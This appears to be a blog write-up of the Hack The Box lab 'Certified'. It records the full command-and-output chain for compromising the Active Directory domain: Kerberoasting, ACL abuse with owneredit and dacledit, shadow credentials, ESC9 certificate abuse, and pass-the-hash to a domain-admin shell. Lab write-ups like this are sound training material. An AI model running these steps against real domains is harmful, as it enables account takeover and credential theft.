Post

Hack The Box - Certified

Hack The Box - Certified

User

Recon

1
2
3
4
5
6
7
8
9
10
11
12
13
Open 10.129.231.186:53
Open 10.129.231.186:88
Open 10.129.231.186:139
Open 10.129.231.186:135
Open 10.129.231.186:389
Open 10.129.231.186:445
Open 10.129.231.186:464
Open 10.129.231.186:593
Open 10.129.231.186:636
Open 10.129.231.186:3269
Open 10.129.231.186:3268
Open 10.129.231.186:5985
Open 10.129.231.186:9389

from ldap we know

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
❯ ldapsearch -x -H ldap://10.129.231.186 -s base -b ""

# extended LDIF
#
# LDAPv3
# base <> with scope baseObject
# filter: (objectclass=*)
# requesting: ALL
#

#
dn:
domainFunctionality: 7
forestFunctionality: 7
domainControllerFunctionality: 7
rootDomainNamingContext: DC=certified,DC=htb
ldapServiceName: certified.htb:dc01$@CERTIFIED.HTB
isGlobalCatalogReady: TRUE
...
...

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1
1
2
3
4
5
6
7
8
9
10
11
12
13
❯ nxc smb 10.129.231.186 -d certified.htb -u judith.mader -p 'judith09' --users
SMB         10.129.231.186  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.231.186  445    DC01             [+] certified.htb\judith.mader:judith09 
SMB         10.129.231.186  445    DC01             -Username-                    -Last PW Set-       -BadPW- -Description-              
SMB         10.129.231.186  445    DC01             Administrator                 2024-05-13 14:53:16 0       Built-in account for administering the computer/domain
SMB         10.129.231.186  445    DC01             Guest                         <never>             0       Built-in account for guest access to the computer/domain 
SMB         10.129.231.186  445    DC01             krbtgt                        2024-05-13 15:02:51 0       Key Distribution Center Service Account 
SMB         10.129.231.186  445    DC01             judith.mader                  2024-05-14 19:22:11 0        
SMB         10.129.231.186  445    DC01             management_svc                2024-05-13 15:30:51 0        
SMB         10.129.231.186  445    DC01             ca_operator                   2024-05-13 15:32:03 0        
SMB         10.129.231.186  445    DC01             alexander.huges               2024-05-14 16:39:08 0        
SMB         10.129.231.186  445    DC01             harry.wilson                  2024-05-14 16:39:37 0        
SMB         10.129.231.186  445    DC01             gregory.cameron               2024-05-14 16:40:05 0       

now since we have some users first we try kerberoasting and then as-rep roasting

1
2
3
4
5
6
❯ ntpdate -q 10.129.231.186
server 10.129.231.186, stratum 1, offset +25201.247811, delay 0.34071
...
...
>>> 25201/3600
7.000277777777778
1
2
3
4
5
6
7
8
9
10
11
❯ faketime -f "+7h" GetUserSPNs.py certified.htb/judith.mader:judith09 -dc-ip 10.129.231.186 -request
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName               Name            MemberOf                                    PasswordLastSet             LastLogon  Delegation 
---------------------------------  --------------  ------------------------------------------  --------------------------  ---------  ----------
certified.htb/management_svc.DC01  management_svc  CN=Management,CN=Users,DC=certified,DC=htb  2024-05-13 21:00:51.476756  <never>               



[-] CCache file is not found. Skipping...
$krb5tgs$23$*management_svc$CERTIFIED.HTB$certified.htb/management_svc*$bb542d661c04a963c1e7ba51fdcdca6b$184fd05e40b8e1269aee20ba1205cbc8c9afda0cf2d883bfdb45b8a7973979c88ec924db383f51d9f939bd6a8a82494955be24074a5ca810885d8e2a57e5c7a0253b37c20f990d8b039fba4ff1cc0c0598ae17c3b4b52d91d976e3e15c95d37683855baebea6d1900dc2583f07d256e36ceb7b5d145971c2cdfe893df45199ebfd9d9e3efb7c8d1bfbc2501e8efb962274a429b38e71d5872e2061f586ec3903016404ff7709c552ec5c7e76874b67a208cd703b09192206f24b7330555d167a92399ee6b84b925b8605a675d3af8a59920b0fc23b328a0fceb99592c3862f233166452fdd5f465207c6bb427927efea80fd6b5433f26b57c8bd66f4cfcbcea56e171db16320339ca3d16acc3427fd46fd0f102a71e586b42fc211d0d13cd6c3038236ef40fb70b8ab95c9255b0c9fa721b7c9031d092f3c6cd2cdc791e682cbac9b6607ecb6945f91ef96ec41c1ccea07a9d5e1015b7ab2238c1e359f2fcd782e52d93ea5664139e4eb7a9e670a5a478fa7bf8dccdcf74ff9efc768c374209b5f0870b7cfda9d4e79425753ca9fbb3e57395af7399e66792843dbeedd1c315ebda71b37e42ef9c447046282310d8e33fa03b923bd968bf213e21fac805ddcba150707cbb2db9ede2afc1b28e33e65931b4010968a631874cf89d7738fa9b3eb26f47ad46df36f0b785938fb810938dd2aa03c491b7c6cc567da0ba2b3ef2eb66b2611f8fe1ad5835a0bec064f17b11eab32619fff2b44d560e2b312a0cc038c7e89c550303c933abc8162b5c7e974085590382bb5962a70f9202ed56bcf00317d33175c6036efd7b08e8d3a7999bdc0e2db11b3e828f851927d7765b8a7a0523a4c3b64eee2785857db6378af9223e7a2c22c601dfb58572e4530c8b5ad080c1e34884417b0fd360fdc1361f7b80e8b97660588f39524c6d462172cb6299dcb593145153543c5db291c396674aac1ef561d507db6a0c8babb1317da6357d0678556c6228b341cd9130c7dc3ceafe3900e5919e1fcba74839fc87547053b964d41dc5e8ab5563de10ea812111d5c4297fb05c57af996cb73c9b0fd405e4f4a094e55f3b8ce8445400f415c7a5bea8583a3f5739c54abecb2d8373b7511a1e7a56c3b00dfcb08d9ff2cfbb31bc42ae4ddf086411b5c98cb20f177e5c27798bb5139f6eb1df48c8c28950bdf4642c5156593890864e83a748c4057e9a75f12626c79e9c335d91b5e01fb074b272da1f56ab26ba3a98ec3124a792b735899c59244ce1f8f5f9eb1e840586032fdb24654f7d6ba1ad3f0dcdff7cf669e9cc5e548b1a4b0be9249601f3ff258f391c9ad6a44383bf3a10b30ac7226ffa8314f2fc6fad93180b6b3bd67db56ccba4eea8fe4e695e16c87601c5aa97869ee5b56b4b97fd68d96b91e8363eed2515d7bc1702f9d3a7da12673218237e8a01feb9b8ccad762643ccb65c913a897c4b197bf437c530db219314b7f21eff75e9e9de00df6d70946f7202b55861d77848d994ab08dbbbeb51fd9b25a654ff7c076617f00beceb15ab8d0342570f82d9acdb27be75915079476f80a513c591dba

using bloodhound

bloodhound_ca_op

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
❯ certipy find -u 'judith.mader@certified.htb' -p 'judith09' -dc-ip 10.129.231.186 -enabled -vulnerable -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'certified-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'certified-DC01-CA'
[*] Checking web enrollment for CA 'certified-DC01-CA' @ 'DC01.certified.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : certified-DC01-CA
    DNS Name                            : DC01.certified.htb
    Certificate Subject                 : CN=certified-DC01-CA, DC=certified, DC=htb
    Certificate Serial Number           : 36472F2C180FBB9B4983AD4D60CD5A9D
    Certificate Validity Start          : 2024-05-13 15:33:41+00:00
    Certificate Validity End            : 2124-05-13 15:43:41+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : CERTIFIED.HTB\Administrators
      Access Rights
        ManageCa                        : CERTIFIED.HTB\Administrators
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        ManageCertificates              : CERTIFIED.HTB\Administrators
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Enroll                          : CERTIFIED.HTB\Authenticated Users
Certificate Templates                   : [!] Could not find any certificate templates

no exploitable certs now to exploit writeowner over management group and generic write over management user and then generic all over ca operator user

1
2
3
4
5
6
7
8
❯ owneredit.py -action write -new-owner judith.mader -target management certified/judith.mader:judith09 -dc-ip 10.129.231.186
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Current owner information below
[*] - SID: S-1-5-21-729746778-2675978091-3820388244-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=certified,DC=htb
[*] OwnerSid modified successfully!

now give fullcontrol rights to judith over management group

1
2
3
4
5
6
❯ dacledit.py -action write -rights FullControl -inheritance -principal judith.mader -target management certified.htb/judith.mader:judith09 -dc-ip 10.129.231.186
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[*] NB: objects with adminCount=1 will no inherit ACEs from their parent container/OU
[*] DACL backed up to dacledit-20260620-120827.bak
[*] DACL modified successfully!

adding judith to the management group

1
❯ net rpc group addmem Management judith.mader -U 'certified.htb/judith.mader%judith09' -S 10.129.231.186

verify using

1
2
3
❯ net rpc group members Management -U 'certified.htb'/'judith.mader%judith09' -S 10.129.231.186
CERTIFIED\judith.mader
CERTIFIED\management_svc

now we perform a shadow creds attack we can use certipy for that as well

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
❯ faketime -f "+7h" certipy shadow auto -username judith.mader@certified.htb -password judith09 -account management_svc -target certified.htb -dc-ip 10.129.231.186
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Targeting user 'management_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '637b8f4d9ae8468fa5202e0967fdb8ab'
[*] Adding Key Credential with device ID '637b8f4d9ae8468fa5202e0967fdb8ab' to the Key Credentials for 'management_svc'
[*] Successfully added Key Credential with device ID '637b8f4d9ae8468fa5202e0967fdb8ab' to the Key Credentials for 'management_svc'
[*] Authenticating as 'management_svc' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'management_svc@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'management_svc.ccache'
[*] Wrote credential cache to 'management_svc.ccache'
[*] Trying to retrieve NT hash for 'management_svc'
[*] Restoring the old Key Credentials for 'management_svc'
[*] Successfully restored the old Key Credentials for 'management_svc'
[*] NT hash for 'management_svc': a091c1832bcdd4677c28b5a6a1295584
1
2
3
4
5
6
❯ nxc smb 10.129.231.186 -d certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584
SMB         10.129.231.186  445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:None) (Null Auth:True)
SMB         10.129.231.186  445    DC01             [+] certified.htb\management_svc:a091c1832bcdd4677c28b5a6a1295584 
❯ nxc winrm 10.129.231.186 -d certified.htb -u management_svc -H a091c1832bcdd4677c28b5a6a1295584
WINRM       10.129.231.186  5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:certified.htb) 
WINRM       10.129.231.186  5985   DC01             [+] certified.htb\management_svc:a091c1832bcdd4677c28b5a6a1295584 (Pwn3d!)

now we can use evil-winrm to get user flag

Root

since management_svc has generic all over ca_operator we can get the ntlm hashes of ca op using same shadow attack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
❯ faketime -f "+7h" certipy shadow auto -username management_svc@certified.htb -hashes a091c1832bcdd4677c28b5a6a1295584 -account ca_operator -target certified.htb -dc-ip 10.129.231.186
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_operator'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'ded282ddfbea489389f467b8f2ba0ee6'
[*] Adding Key Credential with device ID 'ded282ddfbea489389f467b8f2ba0ee6' to the Key Credentials for 'ca_operator'
[*] Successfully added Key Credential with device ID 'ded282ddfbea489389f467b8f2ba0ee6' to the Key Credentials for 'ca_operator'
[*] Authenticating as 'ca_operator' with the certificate
[*] Certificate identities:
[*]     No identities found in this certificate
[*] Using principal: 'ca_operator@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'ca_operator.ccache'
[*] Wrote credential cache to 'ca_operator.ccache'
[*] Trying to retrieve NT hash for 'ca_operator'
[*] Restoring the old Key Credentials for 'ca_operator'
[*] Successfully restored the old Key Credentials for 'ca_operator'
[*] NT hash for 'ca_operator': b4b86f45c6018f1b664f70805f45d8f2

using certipy again to find vulnerable templates

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
❯ certipy find -u 'ca_operator@certified.htb' -hashes ':b4b86f45c6018f1b664f70805f45d8f2' -dc-ip 10.129.231.186 -enabled -vulnerable -stdout
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 15 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'certified-DC01-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'certified-DC01-CA'
[*] Checking web enrollment for CA 'certified-DC01-CA' @ 'DC01.certified.htb'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : certified-DC01-CA
    DNS Name                            : DC01.certified.htb
    Certificate Subject                 : CN=certified-DC01-CA, DC=certified, DC=htb
    Certificate Serial Number           : 36472F2C180FBB9B4983AD4D60CD5A9D
    Certificate Validity Start          : 2024-05-13 15:33:41+00:00
    Certificate Validity End            : 2124-05-13 15:43:41+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : CERTIFIED.HTB\Administrators
      Access Rights
        ManageCa                        : CERTIFIED.HTB\Administrators
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        ManageCertificates              : CERTIFIED.HTB\Administrators
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Enroll                          : CERTIFIED.HTB\Authenticated Users
Certificate Templates
  0
    Template Name                       : CertifiedAuthentication
    Display Name                        : Certified Authentication
    Certificate Authorities             : certified-DC01-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : False
    Any Purpose                         : False
    Enrollee Supplies Subject           : False
    Certificate Name Flag               : SubjectAltRequireUpn
                                          SubjectRequireDirectoryPath
    Enrollment Flag                     : PublishToDs
                                          AutoEnrollment
                                          NoSecurityExtension
    Extended Key Usage                  : Server Authentication
                                          Client Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 1000 years
    Renewal Period                      : 6 weeks
    Minimum RSA Key Length              : 2048
    Template Created                    : 2024-05-13T15:48:52+00:00
    Template Last Modified              : 2024-05-13T15:55:20+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : CERTIFIED.HTB\operator ca
                                          CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
      Object Control Permissions
        Owner                           : CERTIFIED.HTB\Administrator
        Full Control Principals         : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Write Owner Principals          : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Write Dacl Principals           : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
        Write Property Enroll           : CERTIFIED.HTB\Domain Admins
                                          CERTIFIED.HTB\Enterprise Admins
    [+] User Enrollable Principals      : CERTIFIED.HTB\operator ca
    [!] Vulnerabilities
      ESC9                              : Template has no security extension.
    [*] Remarks
      ESC9                              : Other prerequisites may be required for this to be exploitable. See the wiki for more details.

CertifiedAuthentication is vulnerable to ESC9 now since management_svc has genericall over ca_operator we can use it to update UPN to Administrator

1
2
3
4
5
6
❯ certipy account update -u management_svc@certified.htb -hashes ':a091c1832bcdd4677c28b5a6a1295584' -user ca_operator -upn Administrator -dc-ip 10.129.231.186
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : Administrator
[*] Successfully updated 'ca_operator'

now requesting cert

1
2
3
4
5
6
7
8
9
10
11
❯ certipy req -u ca_operator@certified.htb -hashes :b4b86f45c6018f1b664f70805f45d8f2 -dc-ip 10.129.231.186 -ca certified-DC01-CA -template CertifiedAuthentication
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[*] Request ID is 5
[*] Successfully requested certificate
[*] Got certificate with UPN 'Administrator'
[*] Certificate has no object SID
[*] Try using -sid to set the object SID or see the wiki for more details
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'

now changing upn of ca_operator back to its original state

1
2
3
4
5
6
❯ certipy account update -u management_svc@certified.htb -hashes ':a091c1832bcdd4677c28b5a6a1295584' -user ca_operator -upn ca_operator -dc-ip 10.129.231.186
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Updating user 'ca_operator':
    userPrincipalName                   : ca_operator
[*] Successfully updated 'ca_operator'

now using that cert to get administrator hashes

1
2
3
4
5
6
7
8
9
10
11
12
❯ faketime -f "+7h" certipy auth -pfx administrator.pfx -dc-ip 10.129.231.186 -domain certified.htb
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: 'Administrator'
[*] Using principal: 'administrator@certified.htb'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@certified.htb': aad3b435b51404eeaad3b435b51404ee:0d5b49608bbce1751f708748f67e2d34

and the root flag

1
2
3
4
5
6
7
8
❯ evil-winrm -i certified.htb -u administrator -H 0d5b49608bbce1751f708748f67e2d34
Evil-WinRM shell v3.9
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> more ..\Desktop\root.txt
9abb9a033437b2d7f2dce82ebca59c79
This post is licensed under CC BY 4.0 by the author.